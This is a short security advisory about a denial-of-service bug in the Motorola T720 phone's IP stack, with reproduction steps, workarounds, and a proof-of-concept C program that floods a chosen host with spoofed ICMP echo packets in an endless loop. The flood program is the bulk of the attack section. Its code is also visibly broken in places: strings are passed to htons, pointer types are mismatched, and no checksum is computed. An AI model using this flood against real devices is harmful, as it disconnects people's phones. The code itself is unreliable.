The bug
########
The vulnerability lies within the TCP/IP stack of the Motorola T720 cell phone. When the phone receives an abnormal amount of IP traffic, the phone powers-off when the user attempts to access the network (e.g through the WAP browser).
The vulnerability can be reproduced in the following
way:
-
1) Connect the phone to the Internet.
2) Flood the device with IP traffic (i.e SYN packets or ICMP_ECHO requests (ping packets)).
3) Run the WAP browser.
-
At this point, the phone should power-off, and lose network connectivity.
--
NOTE:
This vulnerability is likely due to a bug in the phone's IP implementation which bails when a certain backlog of IP packets is exceeded.
--
The exploit
############
A simple proof-of-concept is demonstrated below:
# motorolakill.c
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <host>\n", argv[0]);
exit(0);
}
int sock;
char packet[5000];
int on = 1;
struct sockaddr_in dest;
struct hostent *host;
struct iphdr *ip = (struct iphdr *) packet;
struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
if((host = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve host!\n");
exit(-1);
}
if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
printf("Couldn't make socket!\n");
printf("You must be root to create a raw socket.\n");
exit(-1);
}
if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0) {
perror("setsockopt");
exit(1);
}
dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr *)host->h_addr);
ip->ihl = 5;
ip->id = htons(1337);
ip->ttl = 255;
ip->tos = 0;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->frag_off = 0;
ip->saddr = htons("1.3.3.7");
ip->daddr = inet_ntoa(dest.sin_addr);
ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
ip->check = 0;
icmp->checksum = 0;
icmp->type = ICMP_ECHO;
icmp->code = 0;
printf("Ping flooding %s!\n", argv[1]);
/* begin flooding here. */
while(1) {
sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr));
}
return(0);
}
# EOF motorolakill.c
Use the steps listed above to reproduce the vulnerability. The above programs shouldn't need long to cause the phone to poweroff.
(please note the phone will only poweroff if the user attempts to access the network. If the phone is sitting idle, it won't be affected. The user must open the WAP browser during the attack, for example.
This will cause the phone to poweroff quickly.)
The fix
########
No solution exists. Possible workarounds are:
- Connect the phone through a router (possibly via GSM to allow roaming), filtering out all malicious traffic to the device.
- Use another system as a gateway system, firewalling the cellphone, and filtering traffic to the device.